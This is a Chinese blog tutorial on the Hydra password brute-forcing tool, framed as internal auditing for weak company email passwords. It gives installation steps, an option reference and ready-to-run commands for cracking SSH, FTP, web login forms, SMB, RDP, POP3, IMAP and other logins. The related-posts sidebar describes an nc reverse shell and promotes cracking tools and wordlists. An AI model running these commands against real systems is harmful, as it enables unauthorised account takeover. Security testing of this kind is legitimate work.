Hydra—密码爆破神器

最新推荐文章于 2024-07-29 08:52:37 发布
最新推荐文章于 2024-07-29 08:52:37 发布
阅读量5.1w 收藏 78
点赞数 9
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yoursshun/article/details/54934142
版权

Hydra—密码爆破神器

公司邮箱系统密码复杂度规则:字母大小写、数字、特殊字符,四选三,长度8位以上。这种复杂度的密码看着是比较安全的,但因历史原因,邮箱系统开放了外网登陆权限,加之公司人数众多,必然会有少量员工把自己的密码设成看似非常复杂但又非常普遍的常规密码,这些密码很容易被爆破,从而导致公司敏感信息泄露。

当必须忍受系统外网登陆的时候,出于业界良心,安全就只能不厌其烦的、定期的使用密码爆破工具主动扫描,主动发现风险用户了。以前用过burpsuite进行Web密码的扫描,操作方便但在爆破密码方面还不够强大(毕竟非专业)。最早听说过Hydra,直到最近才开始真正使用,果真是神器,支持的密码类型众多,足够使用,安装方便、操作简单。详情如下:

一、安装

Hydra一款开源的密码破解工具,目前Windows版本网上也能下载到,但还是推荐使用Linux版本。当前已发布linux 8.0版本,详见:

http://www.freebuf.com/sectool/36461.html

上面8.0的包在我个人的Redhat虚拟机上没有make成功,所以我安装的是7.4版本。下载地址:http://pan.baidu.com/s/1jI4tKhg

Redhat环境安装过程非常简单:

1、先安装工具依赖包

直接 yum install openssl-devel pcre-develncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel

2、编译安装

把安装包上传至服务器:

# tar zxvf hydra-7.4.1.tar.gz
# cd hydra-7.4.1
# ./configure 
# make 
# make install
 

二、使用实例

在文件夹里面新建user.txt,password.txt进行扫描了。

实例截图(SSH登陆密码):


实例截图(邮箱登陆密码):



三、命令语法

# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]   server service [OPT]

具体解释:

-R
继续从上一次进度接着破解

-S
大写,采用SSL链接

-s<PORT>
小写,可通过这个参数指定非默认端口

-l<LOGIN>
指定破解的用户,对特定用户破解

-L<FILE>
指定用户名字典

-p<PASS>
小写,指定密码破解,少用,一般是采用密码字典

-P<FILE>
大写,指定密码字典

-e<ns>
可选选项,n:空密码试探,s:使用指定用户和密码试探

-C<FILE>
使用冒号分割格式,例如登录名:密码来代替-L/-P参数

-M<FILE>
指定目标列表文件一行一条

-o<FILE>
指定结果输出文件

-f
在使用-M参数以后,找到第一对登录名或者密码的时候中止破解

-t<TASKS>
同时运行的线程数,默认为16

-w<TIME>
设置最大超时的时间,单位秒,默认是30s

-v /-V
显示详细过程

server
目标ip

service
指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm]imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy ciscocisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhereteamspeak sip vmauthd firebird ncp afp等等

OPT  可选项

四、各协议的具体命令:

1、破解ssh

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3get方式提交,破解web登录:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get/admin/index.PHP

4post方式提交,破解web登录:

hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"


hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form"login.php:id=^USER^&passwd=^PASS^:<title>wrong username orpassword</title>"

(参数说明:-t同时线程数3-l用户名是admin,字典pass.txt,保存为out.txt-f 当破解了一个密码就停止, 10.36.16.18目标iphttp-post-form表示破解是采用httppost方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。)

5、破解https

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6、破解teamspeak

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

7、破解cisco

hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb

hydra -l administrator -P pass.txt 10.36.16.18 smb

9、破解pop3

hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp

hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy

hydra -l admin -P pass.txt http-proxy://10.36.16.18

12、破解imap

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

 

Eleven_
关注
  • 9
    点赞
  • 78
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
爆破神器hydra
afei001
02-13 648
1.hydra简介     hydra是著名黑客组织thc的一款开源的暴力密码爆破工具,可以在线爆破多种密码。 2.hydra参数详解: R 根据上一次进度继续爆破 -S 使用SSL协议连接 -s 指定端口 -l 指定用户名 -L 指定用户名字典(文件) -p 指定密码爆破 -P 指定密码字典(文件) -e 空密码探测和指定用户密码探测(ns) -C 用户名可以用:分割(username:pa...
[网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求(二)
杨秀璋的专栏
01-13 1万+
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台获取邀请码、注册过程。本文将分享Web渗透三道入门题目,它们包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。基础性文章,希望对您有所帮助!
hydra密码爆破字典压缩后120M,password压缩前386M。
03-03
hydra密码爆破字典压缩后120M,压缩前386M。下的别人的,共享出来
【网络安全渗透测试零基础入门必知必会】之Hydra密码爆破工具使用教程图文教程,零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
07-29 440
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段暴力猜解与防御第6篇。本文主要讲解Hydra密码爆破工具Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。参数:-l 指定用户名-p 指定密码-L 指定用户名字典-P 指定密码字典-C 指定所用格式为“user:password”的字典文件-en null,表示尝试空密码s same,把用户名本身当做密码进行尝试r 反向,把用户名倒叙,当做密码进行尝试。-vV 显示执行细节-o 保存执行结果。
Hydra密码爆破工具使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
12-06 2万+
Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。
Hydra密码爆破工具命令大全
一杯咖啡的渗透记忆
08-16 6886
Hydra是一款非常专业的密码爆破工具,它一般工作在Linux环境下面,不过在Windows版本早就已经有了,这款密码爆破工具的功能可谓是非常强大,支持的协议非常之多,比如常见的rdp、ssh、FTP、smb等,甚至连普通web表单也是可以直接拿来爆破的。这款工具的安装非常简单就不多说了,下面就介绍一下Hydra的一些常用密码爆破命令。 命令语法 # hydra [[[-l LOGIN|-L ...
使用hydra进行SSH爆破
qq_53218512的博客
06-02 6086
mobaxterm 的功能非常全面,几乎提供了所有重要的远程网络工具(比如 SSH、X11、RDP、VNC、FTP、MOSH 等),以及 Windows 桌面上的 Unix 命令(bash、ls、cat、sed、grep、awk、rsync 等),登录之后默认开启 sftp 模式。命令的意思是:使用bin.bash里面的shell,用nc命令反弹shell,反弹到攻击机的7777端口,-e代表需要执行的指令,这里是要执行/bin/bash。发现通过计划任务执行了bash/tmp下面的task.sh文件。
应用协议安全:Hydra 端口爆破工具.(九头蛇)
dzqxwzoe的博客
07-05 1053
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!(2)实战:爆破 远程桌面 RDP.( 3389 端口 )(10)实战:爆破 PgSQL数据库( 5432 端口 )(6)实战:爆破 MSSQL数据库( 1433 端口 )(7)实战:爆破 MySQL数据库( 3306 端口 )(9)实战:爆破 Redis数据库( 6379 端口 )(1)实战:爆破 SSH 协议.( 22 端口 )④50份安全攻防面试指南。
记一次hydra密码破解神器的学习
qq_39816136的博客
04-18 519
密码破解,hydra,工具,交流。
38.网络安全渗透测试—[穷举篇1]—[穷举爆破神器九头蛇hydra详细讲解和利用]
qwsn
08-06 2627
一、常见的端口服务 二、九头蛇hydra的安装 1、九头蛇hydra:`穷举爆破神器` 2、九头蛇hydra:`kali自带的工具` 三、常见的端口服务穷举 1、ssh服务的爆破: 2、ftp服务的爆破: 3、rdp服务的爆破hydra不可以爆破 4、mssql服务的爆破 5、mysql服务的爆破:mysql需要开启允许远程连接且最大错误连接次数需要很大 6、oracle服务的爆破 7、redis服务的爆破 8、postgresql服务的爆破弱口令检测 9、指定多个ip进行穷举
黑雨POP3邮箱密码暴力破解器2.31
04-23
黑雨POP3邮箱密码暴力破解器2.31,一款专门用于破解邮箱口令的工具。它是一个基于POP3协议的自动登录机,可以利用POP3协议的功能,对可能的用户密码进行登录试验,从而获得用户的密码。这种软件必须在连线状态下使用,适用于取得有邮箱的用户之密码。前提是你必须有一个目标主机的帐号。
红队专题-渗透工具-hydra爆破神器
aming小老弟
03-15 686
主要步骤讲完后,下面来看看整个代码,看如何用shell程序将这些串起来。当然,能否破解成功,有一个好用的工具固然重要,但还需要一个强健的密码本。grep “host:”用来过滤打印的输出,只输出破解到密码的条目。第二步为,读取22-output.txt文件中开放22端口的主机,这条命令的含义是采用密码本./password.txt中的密码,因此,在shell中写了一个循环,hydra一次任务结束后,遍历代码很简单,不用惊讶,这就是shell脚本的神奇之处。对一个网段的扫描,也可以换成一个IP。
学“狂飙”的网络安全,做最强盛的打工人!!
Karka_的博客
03-18 218
*刚刚结课,就有学员找到了14K的薪资。**课程虽已结束,但我们的结业帮扶持续进行。束,但我们的结业帮扶持续进行。
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)
qq_45722813的博客
12-06 2522
Vulnhub靶场渗透测试DC-4(hydra爆破密码的使用) 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/ 将下载好的靶机导入到VMware中,修改其网络模式为NAT模式,然后开启靶机 在kali攻击机进行主机发现,获取靶机的IP地址,使用工具arp-scan或者nmap都可以 注意: 如果发现不了靶机IP,则需要修改靶机的网络设置,参考文章https://blog.csdn.net/qq_45722813/article/details/1213246
【网安神器篇】——hydra爆破工具
Demo不是emo的博客
11-22 1万+
今天给大家分享的神兵利器是一款爆破工具——hydra
爆破密码-hydra
无痕的博客
02-15 1万+
hydra爆破密码
Hydra常用的爆破语句
huangbaokang的博客
12-27 766
1、破解ssh: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 2、破解ftp: hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV...
hydra爆破mysql
04-27
Hydra是一款常用的密码爆破工具,可以用于测试系统的密码强度。它支持多种协议和服务,包括MySQL数据库。下面是使用Hydra进行MySQL爆破的一般步骤: 1. 安装Hydra:首先需要在你的系统上安装Hydra。你可以从Hydra的官方网站或者其他可靠的资源中获取安装包,并按照指示进行安装。 2. 确定目标:确定你要进行爆破的MySQL服务器的IP地址和端口号。 3. 构建密码字典:准备一个密码字典文件,其中包含可能的密码组合。你可以使用常见的密码字典,也可以自己创建一个。 4. 运行Hydra:使用以下命令运行Hydra进行MySQL爆破: ``` hydra -L <用户名字典文件> -P <密码字典文件> <目标IP地址> mysql ``` 其中,`<用户名字典文件>`是包含可能的用户名列表的文件路径,`<密码字典文件>`是包含可能的密码列表的文件路径,`<目标IP地址>`是要爆破的MySQL服务器的IP地址。 5. 等待结果:Hydra将自动尝试使用用户名字典和密码字典中的组合进行爆破。等待Hydra完成爆破过程,它将输出成功找到的用户名和密码组合。 请注意,使用Hydra进行密码爆破是一种潜在的非法行为,除非你有合法的授权或者在合法的渗透测试环境中进行。在任何情况下,都要遵守法律和道德规范。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值